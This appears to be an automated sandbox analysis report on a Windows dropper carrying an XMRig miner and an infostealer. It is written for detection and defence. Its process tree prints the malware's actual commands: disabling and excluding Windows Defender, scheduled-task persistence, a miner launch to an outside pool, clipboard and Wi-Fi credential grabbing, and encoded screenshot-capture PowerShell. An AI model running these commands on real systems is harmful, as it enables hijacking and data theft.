Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 01:01

General

  • Target

    188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe

  • Size

    37.2MB

  • MD5

    15753001204630c254b85fceadcb3027

  • SHA1

    ea16917f1cf19b86f53b61e032a010c607a7ed05

  • SHA256

    188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5

  • SHA512

    7dd7a7ed06139933f79ff5e298fbfa9b63f19e4c7881f55dd208261f4bf5793a9bd58de66dec60b495c40955d61c9182472840358d80ab30f73ef1ab4989d75b

  • SSDEEP

    786432:lzynVYtYYbKGk6ojijibkmr3x/Y25UQmxzgir:RYh6ouwPJX5URg

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe
    "C:\Users\Admin\AppData\Local\Temp\188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4644
    • C:\Users\Admin\AppData\Local\Temp\sxmr.exe
      "C:\Users\Admin\AppData\Local\Temp\sxmr.exe"
      2⤵
      • Executes dropped EXE
      PID:3144
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sxmr.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:720
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
            PID:4884
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4624
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5052
          • C:\Windows\System32\cmd.exe
            "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            4⤵
              PID:2008
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3684
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
              4⤵
                PID:1808
                • C:\Users\Admin\AppData\Local\Temp\services64.exe
                  C:\Users\Admin\AppData\Local\Temp\services64.exe
                  5⤵
                  • Executes dropped EXE
                  PID:1504
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                    6⤵
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4404
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                      7⤵
                        PID:3720
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1040
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1488
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2292
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "/sihost64"
                          8⤵
                            PID:680
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=44cYetZ659aFV3HZjALibNdHK44yBCckEb1qWMyRmw7QAhNLf7T6EvMW4p7kFA8hzQFXMK8aC1JEtGaG6zriSY1bQK4w5NH --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                          7⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4360
              • C:\Users\Admin\AppData\Local\Temp\Built.exe
                "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1268
                • C:\Users\Admin\AppData\Local\Temp\Built.exe
                  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                  3⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:4120
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2376
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2500
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3972
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4568
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‎  .scr'"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4512
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‎  .scr'
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4904
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2204
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1584
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3688
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2548
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3800
                    • C:\Windows\System32\Wbem\WMIC.exe
                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      5⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3228
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    4⤵
                    • Clipboard Data
                    • Suspicious use of WriteProcessMemory
                    PID:4892
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-Clipboard
                      5⤵
                      • Clipboard Data
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1688
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4812
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3540
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4104
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      5⤵
                        PID:2444
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      4⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:4944
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        5⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:908
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:548
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        5⤵
                        • Gathers system information
                        PID:376
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:744
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        5⤵
                          PID:4320
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3900
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3820
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zmueggx1\zmueggx1.cmdline"
                            6⤵
                              PID:392
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1BA.tmp" "c:\Users\Admin\AppData\Local\Temp\zmueggx1\CSC8F7293B51AEB446686E56B9CBAF603C.TMP"
                                7⤵
                                  PID:3228
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4612
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              5⤵
                                PID:4888
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                              4⤵
                                PID:2564
                                • C:\Windows\system32\attrib.exe
                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                  5⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:4672
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                4⤵
                                  PID:4536
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:4444
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                    4⤵
